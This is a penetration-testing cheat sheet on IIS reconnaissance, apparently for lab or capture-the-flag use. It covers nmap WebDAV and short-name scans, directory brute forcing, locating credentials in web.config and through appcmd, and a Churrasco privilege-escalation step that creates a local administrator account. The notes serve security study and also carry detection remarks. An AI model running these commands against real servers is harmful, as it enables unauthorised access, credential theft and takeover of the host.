IIS

web, windows, enum

Ports #

Common Pages #

Headers #

Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

Recon #

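# Nmap NSE script: checks whether password-protected WebDAV folders on
# the server can be reached without credentials.
nmap -p80 10.10.10.29 --script http-iis-webdav-vuln

# Other way of getting the IIS version: -I sends a HEAD request and
# prints only the response headers. You will see something like
# "Server: Microsoft-IIS/10.0". The header can be removed or rewritten
# by the administrator, so treat it as a hint, not as proof of version.
curl -I http://10.10.10.29

# You can get the iisfinal.txt from hacktricks and feed it to gobuster.
# The URL has to be quoted: unquoted, the shell reads "&" as "run in the
# background", so curl never receives the token or the -o option and no
# wordlist is written. --fail keeps curl from saving an HTTP error page
# as the wordlist. The file is served from a third-party bucket, so skim
# its contents before using it.
curl --fail 'https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-L_YlVBGlH_l7w9zCtQO%2F-L_YlWYOMUA7fr799GvH%2Fiisfinal.txt?alt=media&token=de499b23-3599-45ce-ad7e-7800858b3dac' -o iisfinal.txt
gobuster dir -u http://10.10.10.29 -w iisfinal.txt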

Interesting Files #

# Contains SQL connection strings, passwords and other
# sensitive data. This is similar to `.htaccess` in Apache.
web.config

# index file
iisstart.htm

Logins #

# Nmap NSE script that tries to recover 8.3 "short" file and directory
# names from the web root. The result depends on NTFS short-name
# generation being enabled on the server's volume.
nmap --script http-iis-short-name-brute -p 80 10.10.10.29

Downloads #

appcmd.exe #

# check if you have permissions: appcmd reads the IIS configuration, so
# this listing of application pools presumably fails with an access error
# when the current account lacks rights to it (verify on the host)
C:\Windows\system32\inetsrv\appcmd.exe list apppools

# may show credentials: lists the configured virtual directories.
# NOTE(review): a virtual directory set up with a fixed account keeps that
# account's credentials in the IIS configuration, which is why read access
# to this configuration should be limited to administrators.
C:\Windows\system32\inetsrv\appcmd.exe list vdir

Some Vulnerabilities #

# https://github.com/Re4son/Churrasco
# Churrasco is a local privilege-escalation tool. Each line below hands a
# quoted `net` command to churrasco.exe: the first creates a local account,
# the second adds that account to the local Administrators group.
# Both changes are written to the Security event log as account-management
# events when that audit category is enabled, so an unexpected new local
# administrator on an IIS host is a strong signal to investigate.
c:\Inetpub>churrasco.exe -d "net user /add <username> <password>"
c:\Inetpub>churrasco.exe -d "net localgroup administrators <username> /add"

Other resources #